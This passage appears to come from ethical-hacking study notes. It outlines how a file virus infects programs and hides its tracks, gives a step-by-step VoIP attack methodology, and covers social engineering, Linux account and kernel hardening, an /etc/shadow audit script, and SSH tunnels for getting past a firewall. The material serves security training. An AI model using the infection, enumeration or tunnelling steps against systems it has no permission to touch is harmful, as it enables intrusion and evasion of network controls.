Polymorphic Viruses

Macro Viruses

ActiveX Viruses

FAT

COM Viruses

Virus Infection

STEP I – Find a file to infect

Efficiency in finding a file to target increases the virus's performance and reduces the time it spends, and can be noticed, searching the disk.

STEP II – Check the infection criteria

Check whether this file or program should be infected at all (right type, right size, not a file the virus wants to avoid).

STEP III – Check for previous infection

Check whether the file is already infected, usually by looking for a marker the virus left, so that it is not infected twice.

STEP IV – Infect the file

Save the file's attributes and timestamps; clear the read-only, hidden and system attributes; open the file in read/write mode; write the virus code into it and patch the entry point so the virus runs first.

STEP V – Cover tracks

Restore the original attributes and timestamps to avoid detection.

Trigger Mechanism

A trigger is a logical condition that activates the virus's payload. Triggers are of the following types:

Counter Trigger

KeyStroke Trigger

Time Trigger

Replication Trigger

System Parameter Trigger

Null Trigger


12. MOBILE PHONE & VOIP HACKING

Introduction

Voice over Internet Protocol (VoIP) is the transmission of voice over IP-based networks, also known as "packet telephony". It uses the IP protocol to route voice traffic. Voice is compressed with codecs, so bandwidth is used efficiently. VoIP is renowned for its low cost, which is especially advantageous for long-distance calls.

VOIP Hacking Steps

Footprinting

Scanning

Enumeration

Exploiting the network

Footprinting

Public web site research, Google hacking, and WHOIS and DNS analysis. The information gathered includes:

Organizational Structure and corporate locations

Help & Tech Support

Job Listings

Domain name Lookup

Phone numbers and extensions

VoIP vendors press releases and case studies

Resumes

Mailing lists and local user group postings

Web based VoIP logins

Scanning

Collect a list of active targets and work out which devices are reachable on the network: ping a large number of IP addresses and wait for responses.

Methods to ping:

ICMP ping sweeps

ARP pings (on the local segment; ARP cannot be filtered the way ICMP can)

TCP ping scans

SNMP sweeps

Then determine which services and vulnerabilities are present on each target host or device.

Methods to scan for active services:

TCP scan

UDP scan (SIP signalling and RTP media run over UDP, so a TCP-only scan misses most VoIP services)

Determine the type of each device or host by OS and firmware.

Method to identify hosts and devices:

Stack fingerprinting

Tools:

Nmap

Xprobe2

Arkin

Queso

Snacktime

Enumeration

Extract user names using Windows 2000 enumeration.

Gather information from the host using null sessions.

Perform Windows enumeration using SuperScan4.

Get user accounts using GetAcct.

Perform an SNMP port scan using SNScan v1.05.

Exploiting the network

Launch attacks based on the vulnerabilities found.

Compromise a network node.

Gain access to the network.

Once on the network, start sniffing: signalling and media usually travel unencrypted.

Intercept and manipulate VoIP signalling to insert rogue applications.

13. SOCIAL ENGINEERING

Social Engineering is the art of manipulation and the skill of exploiting human weakness. A social

engineering attack may occur over the phone, by e-mail, by a personal visit, or through the

computer. The intent of the attack is to acquire information, such as user IDs and passwords.

While these attacks may seem relatively low-tech, they target an organization's weakest link, its employees.

Common Types of Social Engineering

Social engineering attacks can be divided into two categories:

Human Based

Computer Based

Human Based Impersonation

Human based attacks are relatively low-tech and are reminiscent of a scam or something you would

expect from a con man. The six primary types of human based social engineering are listed below:

Important User

Tech Support


Third Party Authorization

In Person

Dumpster Diving

Shoulder Surfing

Computer Based Impersonation

This type of social engineering attack attempts to use a computer as the interface. These attacks can

come in any of the following forms:

Mail Attachments

Popup Windows

Website Faking

SPAM

Social Engineering Prevention

Defense requires a good offense. Employees need to be made aware of social engineering attacks. They must also be given procedures for verifying an individual's identity, and training and education must be continual to remind employees to protect valuable resources. The following three steps help protect your organization from this easy-to-launch, hard-to-prevent attack:

Policies and Procedures

Training

Employee Education

14. LINUX HACKING

Linux Basics

Linux is case sensitive.

Linux filenames can be up to 255 bytes long on the common filesystems.

In Linux, file extensions play no special role and are not required.

Its file system is hierarchical, with the root directory denoted by /.

Linux has no drive letters; disks and partitions appear as device files such as /dev/sda1 and /dev/sda2 and are mounted into the single directory tree.

nano, vi, vim and pico are common command-line editors.

cp copies a file; mv moves and renames a file.

mkdir creates a directory; rmdir removes empty directories; rm deletes files and (with -r) directories.

find locates files.

Linux has three kinds of user: the root user, service (system) users and normal users.

The root user always has uid:gid 0:0. Any other account with uid 0 is root under another name and should be treated as a red flag.

Normal users get uids from a distribution-specific minimum upwards: 500 on older Red Hat releases, 1000 on Debian, Ubuntu and current Red Hat (UID_MIN in /etc/login.defs).

Service users have uids between 1 and that minimum and are not allowed to log in interactively by default (their shell is /usr/sbin/nologin or /bin/false), whereas root and normal users can.

Each user's uid, gid, home directory and shell are recorded in /etc/passwd.

Password hashes are stored in /etc/shadow, readable only by root. Historically these were MD5-based ($1$); current distributions use SHA-512 ($6$) or yescrypt ($y$), and an MD5 hash today is a sign of a stale or badly configured system.

arp shows the ARP cache, the mapping from IP addresses to Ethernet (MAC) addresses on the local segment.

ifconfig (or ip addr on current systems) lists all network interfaces and their addresses; ipconfig is the Windows equivalent.

ps lists the processes running on the server.

route (or ip route) lists the routing table.

shred deletes a file securely by overwriting its contents first (this is ineffective on journaling or copy-on-write filesystems and on SSDs).
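The account rules listed above can be checked mechanically. The following is an added example, not part of the original material: it parses /etc/passwd and /etc/shadow content and reports uid 0 accounts that are not root, service accounts with interactive shells, empty password fields and legacy MD5 or DES hashes. The two files are constructed samples; the hash strings are made up but follow the real $id$salt$hash layout, and the uid threshold is the UID_MIN assumption discussed above.

```python
# Added example (not from the original material): audit /etc/passwd and
# /etc/shadow content.  PASSWD_SAMPLE and SHADOW_SAMPLE are constructed; the
# hash values are made up but use the real "$id$salt$hash" layout.
from typing import Dict, List, NamedTuple, Tuple

# Hash identifiers used by crypt(3) on Linux.
HASH_ALGORITHMS: Dict[str, str] = {
    "1": "md5", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256", "6": "sha512", "y": "yescrypt",
}
WEAK_ALGORITHMS = {"md5", "des"}
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


class Account(NamedTuple):
    name: str
    uid: int
    gid: int
    home: str
    shell: str


def parse_passwd(text: str) -> List[Account]:
    accounts: List[Account] = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        name, _pw, uid, gid, _gecos, home, shell = line.split(":")
        accounts.append(Account(name, int(uid), int(gid), home, shell))
    return accounts


def parse_shadow(text: str) -> Dict[str, str]:
    """Map user name to the password field (second column) of /etc/shadow."""
    hashes: Dict[str, str] = {}
    for line in text.splitlines():
        if line and not line.startswith("#"):
            name, field = line.split(":")[:2]
            hashes[name] = field
    return hashes


def hash_algorithm(field: str) -> str:
    """Classify a shadow password field: empty, locked, a known $id$ hash, or legacy DES."""
    if field == "":
        return "empty"
    if field.startswith(("!", "*")):
        return "locked"
    if field.startswith("$"):
        return HASH_ALGORITHMS.get(field.split("$")[1], "unknown")
    return "des"          # 13-character traditional crypt, no $ prefix


def classify_user(uid: int, uid_min: int = 1000) -> str:
    if uid == 0:
        return "root"
    return "service" if uid < uid_min else "normal"


def audit(passwd_text: str, shadow_text: str, uid_min: int = 1000) -> List[Tuple[str, str]]:
    """Return (user, issue) pairs.  uid_min is UID_MIN from /etc/login.defs:
    1000 on Debian/Ubuntu and current Red Hat, 500 on older Red Hat."""
    findings: List[Tuple[str, str]] = []
    shadow = parse_shadow(shadow_text)
    for acct in parse_passwd(passwd_text):
        kind = classify_user(acct.uid, uid_min)
        if kind == "root" and acct.name != "root":
            findings.append((acct.name, "uid 0 account that is not root"))
        if kind == "service" and acct.shell not in NOLOGIN_SHELLS:
            findings.append((acct.name, "service account with an interactive shell"))
        algo = hash_algorithm(shadow.get(acct.name, "!"))   # no shadow entry == locked
        if algo == "empty":
            findings.append((acct.name, "empty password field (login without a password)"))
        elif algo in WEAK_ALGORITHMS:
            findings.append((acct.name, f"weak password hash ({algo})"))
        elif algo == "unknown":
            findings.append((acct.name, "unrecognised hash format"))
    return findings


# Constructed samples.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0:backup admin:/root:/bin/bash
svc-backup:x:998:998::/var/backups:/bin/sh
"""
SHADOW_SAMPLE = """root:$6$c0nstructed$Y2x5ZWFybHlub3RhcmVhbGhhc2g:19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
www-data:*:19000:0:99999:7:::
alice:$1$c0nstruc$bm90YXJlYWxtZDVoYXNo:19000:0:99999:7:::
toor:$6$c0nstructed$Y2x5ZWFybHlub3RhcmVhbGhhc2g:19000:0:99999:7:::
svc-backup::19000:0:99999:7:::
"""

if __name__ == "__main__":
    for user, issue in audit(PASSWD_SAMPLE, SHADOW_SAMPLE):
        print(f"{user:12s} {issue}")
```

Run against real files it needs root (to read /etc/shadow); the uid_min argument is what makes the same check correct on an old Red Hat box (500) and a current Debian one (1000).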

Why is Linux Hacked?

Linux runs the majority of web servers on the Internet. Finding a vulnerability in such a popular OS, or in the applications commonly run on it, theref­ore means being able to attack a very large number of sites, depending on the type of vulnerability. Linux users generally run no antivirus program, which makes a compromised Linux machine harder to notice. For servers there are many rootkit scanners and host firewalls, but they are not very easy for non-technical people to use and configure.

Example Vulnerabilities (Ubuntu Security Notices)

Kerberos Vulnerability-[USN-999-1]

LVM2 Vulnerability-[USN-1001-1]

Apache Vulnerability-[USN-990-2]

Dpkg Vulnerability-[USN-986-3]

Secure your Linux

Linux has many built-in mechanisms to secure itself.

/etc/sysctl.conf is used to alter the parameters of the Linux kernel to make it more secure. Apply the following configuration (and reload it with sysctl -p):

net.ipv4.conf.all.rp_filter=1

net.ipv4.conf.all.log_martians=1

net.ipv4.conf.all.send_redirects=0

net.ipv4.conf.all.accept_source_route=0

net.ipv4.conf.all.accept_redirects=0

net.ipv4.tcp_syncookies=1

net.ipv4.icmp_echo_ignore_broadcasts=1

net.ipv4.ip_forward=0

rp_filter drops packets whose source address is not reachable through the interface they arrived on (anti-spoofing) and log_martians logs them; the redirect and source-route settings stop an attacker on the LAN from steering your traffic; tcp_syncookies mitigates SYN floods; ignoring broadcast echo requests stops the host acting as an amplifier in smurf attacks. ip_forward must be 0 on any host that is not deliberately acting as a router; set it to 1 only on a gateway.


Security Enhanced Linux (SELinux)

Security Enhanced Linux (SELinux) is a Linux feature that provides a mechanism for enforcing mandatory access control security policies.

SELinux is not a separate distribution but a set of kernel modifications and user-space tools that confine each process to what its policy allows, so that a compromised service cannot reach what it has no business touching.

SELinux has been integrated into the 2.6 series of the Linux kernel, so separate patches are no longer necessary.

Backtrack

BackTrack was a Linux distribution that became the world's most popular security distribution for penetration testing and vulnerability assessment.

It originated from the merger of two formerly competing distributions focused on penetration testing:

WHAX: a SLAX-based Linux distribution.

Auditor Security Collection: a live CD based on Knoppix.

The overlap between Auditor and WHAX in purpose and tool collection partly led to the merger. BackTrack has since been succeeded by Kali Linux, from the same team.

Patch Management

Patch management is part of the system administrator's job. The task involves applying and testing multiple patches on the available computer systems. Patch management tasks include:

maintaining the set of available patches from each vendor;

deciding which patches to apply first, according to whether they are critical or optional;

ensuring that patches are successfully installed; and

testing the system for stability after installation.

There are many tools on the market that automate this process, including RingMaster's Automated Patch Management and Gilbrator's Everguard; on Linux the distribution's own package manager (apt, yum/dnf) does most of the work.

SSH Connection

SSH is a protocol that enables remote administration of computers over encrypted, authenticated connections. An SSH client logs in to a remote machine and allows commands to be executed on it.

RSH and Telnet allow remote administration in a similar way, but these protocols are insecure: they transfer everything, including passwords, in plain text over the network.

OpenSSH on Linux and PuTTY on Windows are the usual SSH clients for communicating with an SSH server.

SSH Tunneling

SSH Tunneling can be used to bypass the security restrictions imposed by a proxy server and firewall on a network. During tunneling the SSH client is used to send the data meant for other protocols such as SMB or HTTP.

For SSH tunneling we will require two machines: one inside the restricted network and the other outside the network. The system outside the restricted network should be configured as an SSH server and the system inside the restricted network should be configured as an SSH client.

Eg. We have a situation where port 22 is open in the restricted network and all the other services like FTP, HTTP & SMTP are blocked. In this scenario we can use SSH tunneling to browse the normal internet by using the SSH server as a proxy which fetches the web pages for my client and sends me the data wrapped in the SSH protocol, which is allowed in the network.

SSH Tunneling can also be used to carry traffic from protocols that are themselves unencrypted between the SSH client and server, so that it is encrypted in transit.
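The scenario above, worked as an added shell example that is not part of the study material: build_tunnel_cmd produces the OpenSSH client invocation (a dynamic -D forward for the browse-through-the-server case, a local -L forward for a single fixed service), and audit_sshd_forwarding shows the server-side setting that decides whether such tunnels can exist at all, because OpenSSH's AllowTcpForwarding defaults to yes when the directive is absent from sshd_config. The host names, user names, ports and the two sshd_config samples are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the study material). Hosts, users and ports are placeholders.

# build_tunnel_cmd MODE USER@HOST LOCALPORT [TARGET]
#   dynamic : ssh -D LOCALPORT  -> local SOCKS proxy; the browser is pointed at it and
#             every page is fetched by the SSH server, so only SSH crosses the firewall.
#   local   : ssh -L LOCALPORT:TARGET -> forwards one fixed service (e.g. intranet-web:80).
# -N opens no remote shell; ExitOnForwardFailure=yes aborts instead of silently running
# without the listener if the local port cannot be bound.
build_tunnel_cmd() {
  mode=$1; dest=$2; lport=$3; target=$4
  case "$mode" in
    dynamic) printf 'ssh -N -o ExitOnForwardFailure=yes -D 127.0.0.1:%s %s\n' "$lport" "$dest" ;;
    local)   printf 'ssh -N -o ExitOnForwardFailure=yes -L 127.0.0.1:%s:%s %s\n' "$lport" "$target" "$dest" ;;
    *)       echo "unknown mode: $mode" >&2; return 1 ;;
  esac
}

# audit_sshd_forwarding FILE
# Print the effective global AllowTcpForwarding value of an sshd_config.
# sshd uses the first occurrence of a directive, and directives after a Match line
# belong to that block, so we stop at the first Match. A missing directive means the
# OpenSSH default, "yes": a config that says nothing still permits -L/-D tunnels.
audit_sshd_forwarding() {
  awk '
    tolower($1) == "match" { exit }
    tolower($1) == "allowtcpforwarding" { print tolower($2); found = 1; exit }
    END { if (!found) print "yes" }
  ' "$1"
}

# Constructed sample configs (not taken from any real host).
SAMPLE_SILENT='Port 22
PasswordAuthentication no
# AllowTcpForwarding no   <- commented out, so it has no effect'
SAMPLE_HARDENED='Port 22
AllowTcpForwarding no
PermitTunnel no
Match User backup
    AllowTcpForwarding yes'

# audit_sample CONFIG_TEXT: write the text to a temp file and audit it.
audit_sample() {
  f=$(mktemp)
  printf '%s\n' "$1" > "$f"
  audit_sshd_forwarding "$f"
  rm -f "$f"
}

# When run directly: the two client commands for the scenario, then both audits.
build_tunnel_cmd dynamic user@outside.example 1080
build_tunnel_cmd local user@outside.example 8080 intranet-web:80
echo "silent config   -> AllowTcpForwarding $(audit_sample "$SAMPLE_SILENT")"
echo "hardened config -> AllowTcpForwarding $(audit_sample "$SAMPLE_HARDENED")"
```

The audit deliberately reports "yes" for the silent config: an administrator who only greps for the directive and finds nothing has not established that forwarding is disabled. The Match block in the hardened sample shows how a per-user exception is expressed without changing the global answer.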

Advantages of Linux

COST- Being an open source project, it comes under the GNU General Public License. Cost is the major factor why Linux is used in more than 80% of servers throughout the world.

SECURITY- Linux is also considered more secure than Windows, as most malware actually targets Windows based computers. Linux has a better user permissions model, which makes it more secure.

STABILITY- Linux is quite stable in comparison to Windows.

Disadvantages of Linux

Due to being open source, the Linux source code and the source code of its associated applications are easily available, which makes it easier to discover security vulnerabilities and flaws. These can be exploited in the wild by hackers.

HARDWARE COMPATIBILITY ISSUE- Linux does not support the latest hardware in some cases, which makes it very uncomfortable for a normal desktop user to use Linux as a main OS over Windows.

Linux is not very easy to use for normal people as it requires extensive knowledge of operating systems and networking to use it comfortably. So, it can be a bit of a hassle for a non-technical person.